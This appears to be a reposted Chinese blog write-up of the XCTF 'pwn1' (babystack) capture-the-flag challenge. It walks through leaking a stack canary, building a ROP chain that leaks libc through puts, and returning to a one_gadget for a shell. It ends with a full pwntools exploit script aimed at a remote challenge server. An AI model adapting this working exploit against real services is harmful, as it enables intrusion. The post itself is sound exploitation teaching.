博客
关于我
攻防世界-pwn1-Writeup
阅读量:566 次
发布时间:2019-03-09

本文共 2235 字,大约阅读时间需要 7 分钟。

pwn1

考点:栈溢出,canary绕过

基本情况

程序实现功能是往栈上读写数据。

保护措施
Arch:     amd64-64-littleRELRO:    Full RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x400000)
栈溢出
......  while ( 1 )  {       menu();    v3 = my_input();    switch ( v3 )    {         case 2:        puts(&s);        break;      case 3:        return 0LL;      case 1:        read(0, &s, 0x100uLL);                  // 栈溢出        break;......

栈溢出空间还是比较大的。

思路

使用栈溢出覆盖 canary 最后一字节,读取出 canary ,成功绕过 canary 保护。

#leak canarypayload = 'a'*0x89add(payload)show()p.recvuntil('a'*0x89)#gdb.attach(p)canary = u64('\x00'+p.recv(7))log.success("canary:"+hex(canary))

题目没有预留后门,并提供 libc ,所以泄露 libc 调用 onegadget getshell 。泄露 libc 需要借助输出函数,即需要控制 rip 调用。

泄露 libc 还需要 rop 回到 main 执行下一步操作。

#leak libcpayload = 'a'*0x88 + p64(canary) + p64(0xdeadbeef)payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt)payload += p64(start_addr)add(payload)leave()puts_leak=u64(p.recv(6).ljust(8,'\x00'))log.success("puts_leak:"+hex(puts_leak))

最后再次控制 rip 。

#get shellpayload = 'a'*0x88 + p64(canary) + p64(0xdeadbeef)payload += p64(onegadget)add(payload)leave()

EXP

from pwn import *context.log_level = 'debug'#p = process("./babystack")p = remote("124.126.19.106",51939)elf = ELF("./babystack")libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")def add(context):    p.recvuntil(">> ")    p.sendline('1')    p.send(context)def show():    p.recvuntil(">> ")    p.sendline('2')def leave():    p.recvuntil(">> ")    p.sendline('3')#leak canarypayload = 'a'*0x89add(payload)show()p.recvuntil('a'*0x89)#gdb.attach(p)canary = u64('\x00'+p.recv(7))log.success("canary:"+hex(canary))#leak libcputs_plt = elf.plt['puts']puts_got = elf.got['puts']pop_rdi = 0x0000000000400a93start_addr = 0x400720payload = 'a'*0x88 + p64(canary) + p64(0xdeadbeef)payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt)payload += p64(start_addr)#gdb.attach(p)add(payload)leave()puts_leak=u64(p.recv(6).ljust(8,'\x00'))log.success("puts_leak:"+hex(puts_leak))libc_base = puts_leak - libc.symbols['puts']log.success("libc_base:"+hex(libc_base))onegadget = libc_base + 0x45216log.success("onegadget:"+hex(onegadget))#get shellpayload = 'a'*0x88 + p64(canary) + p64(0xdeadbeef)payload += p64(onegadget)add(payload)leave()p.interactive()

转载地址:http://smppz.baihongyu.com/

你可能感兴趣的文章
Mysql学习总结(64)——Mysql配置文件my.cnf各项参数解读
查看>>
Mysql学习总结(65)——项目实战中常用SQL实践总结
查看>>
Mysql学习总结(66)——设置MYSQL数据库编码为UTF-8
查看>>
Mysql学习总结(67)——MYSQL慢查询日志
查看>>
Mysql学习总结(68)——MYSQL统计每天、每周、每月、每年数据 SQL 总结
查看>>
Mysql学习总结(69)——Mysql EXPLAIN 命令使用总结
查看>>
Mysql学习总结(6)——MySql之ALTER命令用法详细解读
查看>>
Mysql学习总结(70)——MySQL 优化实施方案
查看>>
Mysql学习总结(71)——MySQL 重复记录查询与删除总结
查看>>
Mysql学习总结(71)——数据库介绍(MySQL安装 体系结构、基本管理)再回顾
查看>>
Mysql学习总结(72)——MySQL 开发者开发,设计规范再总结
查看>>
Mysql学习总结(73)——MySQL 查询A表存在B表不存在的数据SQL总结
查看>>
Mysql学习总结(74)——慢SQL!压垮团队的最后一根稻草!
查看>>
Mysql学习总结(75)——并发量大、数据量大的互联网业务数据库设计军规
查看>>
Mysql学习总结(76)——MySQL执行计划(explain)结果含义总结
查看>>
Mysql学习总结(77)——温故Mysql数据库开发核心原则与规范
查看>>
Mysql学习总结(78)——MySQL各版本差异整理
查看>>
Mysql学习总结(79)——MySQL常用函数总结
查看>>
Mysql学习总结(7)——MySql索引原理与使用大全
查看>>
Mysql学习总结(80)——统计数据库的总记录数和库中各个表的数据量
查看>>